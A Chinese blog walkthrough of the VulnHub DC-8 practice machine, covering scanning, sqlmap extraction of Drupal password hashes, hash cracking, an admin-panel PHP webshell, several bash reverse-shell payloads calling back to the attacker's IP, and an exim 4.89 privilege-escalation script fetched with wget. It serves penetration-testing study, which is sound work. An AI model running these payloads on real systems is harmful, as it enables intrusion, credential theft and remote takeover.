靶机9 DC-8(过程超详细)

已于 2024-09-02 11:31:01 修改
阅读量3.2k 收藏 26
点赞数 9
分类专栏: # 靶机 文章标签: 网络 安全 网络协议 压力测试
于 2022-09-26 14:05:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/honest_run/article/details/127052495
版权

简介:DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。

1、下载靶场

靶机名称:DC-8(包含1个flag)

下载地址:

DC: 8 ~ VulnHub

2、安装靶场

以DC-1为例,将文件解压(一压缩包形式进行下载)。

打开虚拟机,选择解压好的文件导入虚拟机( vof 版本高于4.0,点击重试即可导入)

导入成功,开启此虚拟机( 当页面出现 DC-8 login 时表示安装成功)。

3、获取靶机的flag

前提:

1、已知kali的IP地址(ifconfig)

—— kali IP地址:192.168.108.129/24

2、DC-8和kali在同一网段 | 已知DC-8所在的网段

—— DC-8 IP地址:192.168.108.141/24

3.1信息收集

获取DC-8的IP地址

命令:netdiscover -r 192.168.108.0/24

由图可知DC-8的IP地址是:192.168.108.141/24

端口扫描

命令:nmap -sV -p- 192.168.108.141

//-sV:扫描系统版本和程序版本号检测,-p-:全端口扫描,-O:扫描操作系统

获取信息如下(操作系统:Linux 3.2-4.9):

端口号

服务

版本

22

ssh

7.4p1

80

http

Apche

3.2    渗透测试

打开web进行查看

这是和DC-7一样的CMS(Drupal)

确认CMS(使用工具:CMSeek)

CMS:Drupal

版本:7

目录扫描

dirb http://dc-8

在主页随便点击之后发现 ?nid=1 的传参,直接上sqlmap测试是否存在常规的sql注入

sqlmap的使用

qlmap -u "http://dc-8/?nid=*"  #测试是否崔在SQL注入

qlmap -u "http://dc-8/?nid=*" --is-db #测试当前注入权限是否是最高权限

sqlmap -u "http://dc-8/?nid=*" --current-use #查看当前用户

sqlmap -u "http://dc-8/?nid=*" --current-db #查看当前数据库

sqlmap -u "http://dc-8/?nid=*" --tables -D "d7db" #查看d7db(当前数据库)下的所有表名

sqlmap -u "http://dc-8/?nid=*" --columns -T "users" -D "d7db" #查看users表中的所有列名

sqlmap -u "http://dc-8/?nid=*" --dump -C "uid,name,pass,mail,login" -T "users" -D "d7db"

#查看选定字段(uid、name、pass、mail、login)中的所有数据

这里我们获取到了两个账号的数据

admin $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

john  $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

在这里使用 john(哈希工具)尝试跑一下密码

爆破出来密文:turtle

想偷个懒,看看能不能直接账号对 DC-8 进行ssh登录,结果没成功,只能想办法获取webshell了

在后台登陆页面进行登录(http://dc-8/user),成功使用用户 john(密码:turtle)登录进后台管理页面

在后台管理页面处看到有可以加载php代码的地方,先使用phpinfo进行测试

<p>xjizhi</p>

<?php

phpinfo();

?>

植入一句话(<?php @eval($_POST['webshell']);?>)

使用蚁剑连接失败(http://192.168.108.141/node/3/done?sid=5),没有权限,所以只能执行php代码进行反弹shell,使用第四条成功( system("bash -i > /dev/tcp/192.168.108.129/6868 0>&1");

PHP反弹 shell(Post 请求发送命令)

<?php system("id");?>

<?php echo shell_exec($_GET["cmd"] );exit; ?>

<?php system("bash -i >& /dev/tcp/192.168.108.129/6868 0>&1");?>   #post获取shell

<?php system("bash -i > /dev/tcp/192.168.108.129/6868 0>&1");?>    #交互式shell

<?php system("bash -c 'sh -i &>/dev/tcp/192.168.108.129/6868 0>&1'");?>  #交互式shell

老套路了,顺手改善一下shell交互的环境

python -c "import pty;pty.spawn('/bin/bash')"

查看是否存在suid提权

find / -perm -4000 -type f 2>/dev/null

补充:

  1. SUID是一种对二进制程序进行设置特殊权限,可以让二进制程序执行者临时拥有属主的权限,若是对一些特殊命令设置了SUID,那么将会有被提权的风险
  2. 常用的SUID提权命令有:nmap、vim、find、bash、more、less、nano、cp等。
  1. sudoSUID区别
    1. sudo是给某个用户或者授予执行某些命令的权限,权限在人身上
    2. SUID是给命令赋予root用户的权限,权限在命令上

查讯结果可以看出在使用exim4时具有root权限

进一步查看命令exim4命令版本

exim4 --version(查询结果:Exim version 4.89)

在漏洞库里面寻找可利用的漏洞

searchsploit exim 4.89

直接找没找到可以本地提权的漏洞,扩大一下范围直接找exim的漏洞(searchsploit exim )

查看脚本文件,发现了两个使用脚本提权的方式:

将脚本复制到桌面,使用靶机下载脚本文件

cp /usr/share/exploitdb/exploits/linux/local/46996.sh dc-8.sh

python2 -m SimpleHTTPServer 9999

wget http://192.168.108.129:9999/dc-8.sh

执行脚本

./dc-8.sh -m netcat

点击下方名片,加入GG安全团队,期待师傅们的加入,一起学习一起成长。 

靶机DC-8(详细渗透,适合新手渗透)
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
DC-8靶场
qq_49518993的博客
08-27 957
DC-8靶场
DC-8靶场渗透
sucker的博客
10-21 1849
主机发现靶机IP—端口扫描靶机服务—识别靶机网站服务—测试靶机网站注入点—发现注入点—web渗透SQL注入爆库—获取用户名密码—登入后台—发现后台可执行输入的PHP代码—反弹shell/端口监听—寻找提权漏洞—利用exim4漏洞——将提权脚本通过http协议从攻击机传输到靶机——给定权限使脚本执行——获得root权限,完成渗透。8,点蓝色字体的时候会转跳到Drupal的官方,而这里就只加了参数nid,非常可疑,可能存在有sql注入、xss等漏洞。5,访问一下192.168.23.175,发现一个网站。
新手必刷的五个渗透测试靶场(建议收藏)
最新发布
A_991128a的博客
03-08 896
DVWA靶场是一个专门用于漏洞测试和练习的Web应用程序,旨在为安全专业人员和开发人员提供一个安全漏洞测试环境。DVWA靶场包含了多种常见的Web应用程序漏洞,如SQL注入、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)、文件包含、文件上传、不安全的验证码等。这些漏洞模拟了真实环境中可能遇到的安全威胁。针对每种漏洞类型,DVWA靶场提供了不同难度级别的测试场景,从低级别到高级别,适合不同技术水平的学习者进行挑战。低级别场景通常较为简单,适合初学者入门学习;
DC-8靶机
m0_62094846的博客
07-07 336
ifconfig查找主机IP扫一波内网,探测下存活主机nmap 192.168.61.0/24使用nmap工具对DC-5靶机扫描开放的端口nmap -A -T4 192.168.61.137 -p- -oN nmap137.A点不同的选项,uid会变猜测有sql注入sqlmap -u "http://192.168.61.137/?nid=1"sqlmap -u "http://192.168.61.137/?nid=1" --dbs数据库:d7db 和 information_schemasqlmap -
DC-8 靶机
日常打一些漏洞靶机
07-29 480
根据对比可知DC-8的一个ip地址为192.168.47.133。经过测试发现正确的账户名和密码为john和turtle。选择一个不需要root用户权限的目录,比如tmp。可得出一个叫turtle的密码。ps:如果出现下述情况可输入。出现robots.txt文件。发现存在用户登录的一个界面。选择使用46996.sh。出现root说明提权成功。发现一个比较奇怪的命令。
DC系列靶机-DC8
慕舟舟的博客
10-23 887
作为一个邮件传输代理,Exim可以在不同的邮件服务器之间传递邮件,确保邮件能够正确地到达目的地。这里可以采用和dc5一样的做法;使用python搭建一个简易的服务器,将要下载的文件挂接过去;由于information_schema是MySQL的系统库,访问d7db这个数据库;根据这个版本,选择46996.sh的脚本文件来提权;用户名和密码,不过是加密的;这里存在一个上传并且解析php代码的地方;点击过程中,后面的id=1,会发生变化;这里最有可能出现的就是SQL注入;尝试搜索一下历史的漏洞;
Vulnhub靶机:DC-9渗透详细过程DC系列完结)
IerkeU的博客
03-28 3931
信息收集 nmap -A -sV -p- -T4 192.168.132.156 目前发现只开放80端口,去web页面搜索一下 有一处后台登陆、一处搜索处 在搜索处1' or 1=1#页面返回正常,1' or 1=2#报错,BP抓包发现是POST 输出文件:sql进入kali一把梭 SQLMAP sqlmap -r sql --dbs --dump sqlmap -r sql -D users -T UserDetails -C id,username,password --dump 将admin
DC-1靶机过程(超详细!)
qq_68868384的博客
08-09 222
我们可以在/var/www/sites/default下面找到网站模版的配置文件,配置文件中有flag2和一个mysql数据库的用户和密码,但我们已经不需要了,因为我们已经通过SQL注入的那个脚本进入过了数据库。下载完之后我们通过命令来看一下脚本的用法,这里必须得用python2去运行,其他的都会报错,不知道是不是因为python版本不兼容的原因,运行之后下面就显示了脚本的用法和一些选项参数。根据扫描出来的ip,去查找目标网站,把有80端口开放的ip都去访问一下,看哪一个是我们要找的主机。
vulnhub靶机DC-4 渗透笔记
liver100day的博客
06-09 2299
DC-4 靶机渗透 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机DC-3 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/dc-4,313/ 渗透过程 1.信息收集 1.1 主机发现 arp-scan -l 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) 确认目标靶机IP地址:192.168.75.148 1.2 端口扫描 确认了IP地址,接下来我们就使用端口扫描神器来扫描目标靶机开放的端口 nmap -T4 -
渗透测试综合靶场 DC-2 通关详解
goldfish8848的博客
09-18 1532
DC-2与DC-1的渗透步骤有一些相似之处,但也存在一些区别。靶机发现与IP解析DC-2:发现靶机真实IP后,需要修改hosts文件以解析域名到IP地址,因为直接访问IP时域名解析失败。DC-1:没有提到需要修改hosts文件,直接通过IP进行渗透测试。端口探测DC-2:探测到除了常见的80端口外,还有一个7744端口开放。DC-1:主要提到了22和80端口,没有提到7744端口。网站配置与访问DC-2:需要修改hosts文件后才能访问网站,且网站是基于WordPress的。
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1603
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
vulnhub之DC8靶机
LainWith的博客
02-15 3073
目录介绍信息收集主机发现主机信息探测访问网站目录扫描漏洞发现手工SQL联合查询注入1. 判断列数,得知是1列2. 数据查询&信息收集(union select)3. 获取数据库的表名4. 查询指定表名下的列名信息5. 查询指定列获取数据6. 爆破密码反弹shell提权exim4提权拿到Flag 介绍 系列: DC(此系列共10台) 发布日期:201998日 难度:中级 Flag:此挑战的最终目标是绕过双因素身份验证,获取root权限并读取唯一的Flag 学习: sql注入 网站挂马 exim4
DC8靶机
qq_40646572的博客
05-13 431
信息收集 开启dc8靶机 使用nmap扫描下当前网段。发现存在dc8靶机192.168.85.139主机。且主机开启了22端口以及80端口。 打开http服务。 web——getshell 经过测试,在home页面中,点击侧边栏,存在nid参数,经过测试该处存在sql注入点。 经过测试,当前数据表存在一个字段。 使用联合注入的方式获取到当前数据库名,d7db。 获取当前数据库的表个信息。看到当前数据库存在users数据表格。 Payload= nid=-1 union select gr
渗透测试:DC-8靶机
Ciyaso的博客
08-23 667
一、扫描获取靶机ip arp-scan -l 192.168.203.147 二、获取网站信息 1.nmap 开放22、80端口 2.Wappaloyzer CMS:Drupal Web服务器:Apache 访问网站 3.sqlmap 点击Details下的选项发现url的nid=会发生变化, 在1后面加一个单引号,发现报错,说明存在sql注入 使用sqlmap sqlmap -u http://192.168.203.147/?nid=1 爆库 sqlmap -u http://192.
DC: 8靶机-Walkthrough
ins1ght的博客
09-26 839
DC: 8靶机,不知道是不是这个系列的最后一个靶机,后面会把DC:1~6的Walkthrough都放出来,啥时候不确定,但一定有。靶机做了一些之后就发现“信息收集是王道,注意细节是魔鬼”,尤其这个靶机,真的是细节是魔鬼????。enjoy
DC靶机系列:DC-8
Ays.Ie的博客
02-28 324
本篇文章为DC系列第8靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
靶场练习第十六天~vulnhub靶场dc-8
qq_57976347的博客
02-15 456
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-8.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A -p- 192.168.101.121 2.网站的信息收集 (1)靶机开放了80端口,先访问
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值